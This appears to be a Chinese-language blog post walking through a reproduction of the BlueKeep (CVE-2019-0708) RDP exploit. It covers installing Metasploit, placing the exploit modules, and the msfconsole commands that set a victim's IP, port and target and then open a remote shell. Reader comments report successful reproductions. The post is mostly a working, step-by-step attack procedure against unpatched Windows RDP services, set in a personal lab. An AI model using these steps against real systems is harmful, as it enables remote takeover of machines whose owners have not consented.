0x01
2019年9月7日凌晨,msf上更新了0708的漏洞利用程序。
顿时安全群和朋友圈就爆炸了
-
奈何接到HW攻击队任务,又在家过了个中秋,0809才在今天更新。
0x02 环境
Windows 7 sp1
Kali
exp
0x03 利用
1.一键安装metasploit-framework
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
2.下载Reference中的攻击套件放置文件到msf的相应文件夹
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
msf命令:
使用msfconsole进入metasploit-framework ,reload_all重新加载0708rdp利用模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块
使用set RHOSTS 设置受害机IP
使用set RPORT 设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构
我使用的是Parallels Desktop,设置target 1
使用exploit开始攻击,等待建立连接
建立连接以后,使用shell获得shell,再使用python获得交互式shell,执行whoami
暂无评论
复现了,谢谢。
看了博客,又看了github学习了。成功了。
感谢大佬,复现成功了。